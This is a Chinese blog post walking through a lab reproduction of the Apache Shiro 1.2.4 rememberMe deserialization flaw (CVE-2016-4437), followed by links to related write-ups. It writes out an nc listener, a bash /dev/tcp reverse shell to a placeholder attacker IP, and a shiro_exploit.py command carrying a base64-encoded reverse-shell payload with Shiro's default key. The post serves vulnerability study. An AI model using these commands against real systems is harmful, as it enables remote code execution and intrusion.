Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

最新推荐文章于 2024-05-19 13:41:05 发布
最新推荐文章于 2024-05-19 13:41:05 发布
阅读量919 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 java shiro
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36551839/article/details/107340420
版权

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

1.搭建好环境

2.复现

http://目标IP:8080
在攻击机上运行nc 监听1234端口
nc -l -p 1234
反弹shell指令
bash -i >& /dev/tcp/攻击者IP/1234 0>&1
浏览器访问,出现以下页面则证明环境搭建成功。1. python shiro_exploit.py -u http://127.0.0.1:8080/
在这里插入图片描述将其中的CipherKey放在-k中
其中-p命令中的命令http://www.jackson-t.ca/runtime-exec-payloads.html
在这里插入图片描述
python shiro_exploit.py -u http://ip:8080/ -t 3 -p “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHh4LzEyNzQgMD4mMQ==}|{base64,-d}|{bash,-i}” -k “kPH+bIxk5D2deZiIxcaaaA==”

在这里插入图片描述成功反弹shell
在这里插入图片描述

忘止于心
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1543
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3247
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
Apache shiro反序列化漏洞
SoulCat
10-11 1046
Apache shiro反序列化漏洞 爸爸妈妈问你智能手机怎么用的时候,请不要不耐烦,因为他们曾经不厌其烦的教你怎么用筷子。 漏洞概述: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码学和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 漏洞版本: -Shiro <1...
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
越努力 越自由
03-28 9996
Shiro 1.2.4 反序列化漏洞
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
qq_51163834的博客
06-05 2107
Apache Shiro框架提供了记住密码的功能,用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>BASE64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务器收到请求对RememberMe值,先进行base64解码然后AES解密在反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞
漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE-2016-4437)
cj_Hydra's Blog
06-15 2066
前言: Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 影响版本Apache Shiro <= 1.2.4 漏洞原理: Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码
shiro反序列化漏洞复现(CVE-2016-4437
最新发布
m0_70349048的博客
05-19 480
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2845
CVE-2016-4437 Shiro反序列化漏洞复现
Apache Shiro 1.2.4反序列化漏洞
m0_53603468的博客
12-22 277
第二天总结 概述 今天我们复现了Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437)这一漏洞Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 之后去了解了什么是序列
shiro反序列化漏洞复现(CVE-2016-4437)
m0_67391518的博客
08-24 897
ysoserial集合了各种java反序列化payload;打包完的ysoserial在ysoserial/target文件中mvn package -D skipTests //需要安装maven才能使用mvn命令这个工具是一个集成化工具使用方法为在此文件目录下面cmd,使用shiro_tool.jar工具检测Shiro是否存在默认的key,
shiro RememeberMe 1.2.4反序列化漏洞
Ping_Pig的博客
12-08 1272
shiro简介: shiroJava安全框架):apache shiro 是一个强大且易用的java安全框架框架,执行身份验证 、授权、密码和会话管理。使用shiro的易于理解的API,可以快速、轻松的获得任何应用程序,从最小的的移动应用程序到最大的网络和企业应用程序。apache shirojava的权限及安全验证框架中占有重要的一席之地,在它编号为550的issue中爆出过严重的java...
Java项目中修复Apache Shiro 默认密钥致命令执行漏洞CVE-2016-4437)详细说明
一火的专栏
11-18 1万+
目录 1.漏洞说明 1.1阿里云漏洞短信内容 1.2阿里云漏洞详细报告 2.详细修复步骤 2.1下载漏洞验证工具 3.Java项目修改 3.1修改前注意事项 3.2Jar包准备 3.3增加一个自定义秘钥代码 3.4修改shiro配置 3.5修复后漏洞检测结果 4.常见问题 4.1Unsupported major.minor version 52.0 4.2org.springframework.web.servlet.mvc.annotation.AnnotationM..
Apache Shiro 默认密钥致命令执行漏洞CVE-2016-4437
热门推荐
yuguang的博客
11-17 1万+
目录 一.情况描述 1.漏洞描述 2.漏洞造成的影响 3.安全建议 4.技术参考 5.建设方案 6.漏洞证明 测试结果 二.springmvc修改 1.修改pom.xml配置 2.增加一个自定义秘钥代码 3.修改shiro配置 4.修改完之后测试 一.情况描述 1.漏洞描述 Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。 2.漏洞造成的影响 在配置了默认密钥的情况下,攻击者可以通过精心构造的 Payload 实现远.
shiro CVE-2016-4437漏洞复现
weixin_71090536的博客
01-26 425
shiro 框架:一个安全的用于管理 java 网站登录授权的框架
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
Gblfy_Blog
12-06 4307
文章目录一、分析定位1. 漏洞描述2. 项目引发漏洞简述二、解决方案2.1. 若依系统2.2. Gus系统 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira/browse/SHIRO-550 https://shiro.apache.org/download.html 2. 项目引发漏洞简述 若依/Guns管理系统使用了Apache ShiroShiro 提供了记住我(RememberM
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值